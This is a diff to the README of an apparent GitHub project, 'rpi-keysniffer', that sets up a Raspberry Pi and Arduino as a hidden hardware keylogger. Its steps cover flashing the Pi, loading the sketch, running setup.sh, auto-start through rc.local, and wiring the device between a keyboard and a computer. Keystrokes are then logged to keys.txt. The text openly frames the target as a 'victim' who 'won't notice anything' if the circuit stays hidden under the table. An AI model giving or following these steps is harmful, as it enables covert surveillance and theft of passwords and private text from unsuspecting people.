xployt404/rpi-keysniffer/README.md

 1. flash Raspberry Pi OS Lite (Raspbian Lite) to a micro SD card and insert it into the Pi.
 2. connect to it via ssh (doesnt really matter how, just be able to connect to it)
 3. git clone this repository to your pi
+4. load the serial.ino script onto the Arduino
-4. start the setup.sh script **(don't run it again after completed installation)**
+5. start the setup.sh script **(don't run it again after completed installation)**
-5. connect both keyboard to the pi and the pi to the computer
+6. connect both keyboard to the pi and the pi to the computer
-6. usually the script starts automatically becuase of the change in rc.local but you can start it manually if you want
+7. usually the script starts automatically becuase of the change in rc.local but you can start it manually if you want
-7. now it stores the keyboard strokes in a text file **(keys.txt)** usually in **/home/pi/rpi-keysniffer** and the victim won't notice anything :) <br/>*if it doesnt find the circuit hidden under its table of course
+8. now it stores the keyboard strokes in a text file **(keys.txt)** usually in **/home/pi/rpi-keysniffer** and the victim won't notice anything :) <br/>*if it doesnt find the circuit hidden under its table of course